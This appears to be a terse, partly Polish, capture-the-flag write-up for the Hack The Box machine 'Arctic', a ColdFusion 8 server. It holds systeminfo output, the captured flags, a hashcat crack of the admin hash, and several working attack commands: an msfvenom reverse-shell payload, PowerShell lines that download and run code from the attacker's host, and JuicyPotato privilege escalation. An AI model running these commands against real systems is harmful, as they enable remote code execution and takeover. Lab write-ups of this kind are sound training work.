Arctic - 11.08.2021

Nmap

Port 8500

Wersje

Searchsploit

Systeminfo

systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-507-9857321-84451
Original Install Date:     22/3/2017, 11:09:45 
System Boot Time:          13/8/2021, 5:53:31 
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 292 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.192 MB
Virtual Memory: In Use:    855 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11

https://pentest.tonyng.net/attacking-adobe-coldfusion/

user.txt

02650d3a69a70780c302e146a6cb96f3

Privilages Escalation

Password SHA1

2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03

hashcat -m 100  admin.hash /usr/share/wordlists/rockyou.txt
2f635f6d20e3fde0c53075a84b68fb07dcec9b03:happyday

Debugging & Loging / Scheduled Tasks

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.19 lport=9003 -f exe > shell.exe
powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.19/shell.exe', 'fun.exe')"
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
+ inne ustawienia 
run

Uruchomienie pliku fun.exe na ofierze

SeImpersonatePrivilege

skrypt.bat

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19/rev.ps1')"

JuicyPotato.exe -t * -p C:\ColdFusion8\wwwroot\CFIDE\skrypt.bat -l 9006

CLSID:4991d34b-80a1-4291-83b6-3328366b9097

Sprawdzenie na stronie http://ohpe.it/juicy-potato/CLSID/ i umieszczenie poprawnego w argumencie c

JuicyPotato.exe -t * -p C:\ColdFusion8\wwwroot\CFIDE\skrypt.bat -l 9006 -c "{69AD4AEE-51BE-439b-A92C-86AE490E8B30}"

Nasłuchiwanie na drugiej karcie na porcie 9010, który został wpisany w rev.ps1

root.txt

ce65ceee66b2b5ebaff07e50508ffb90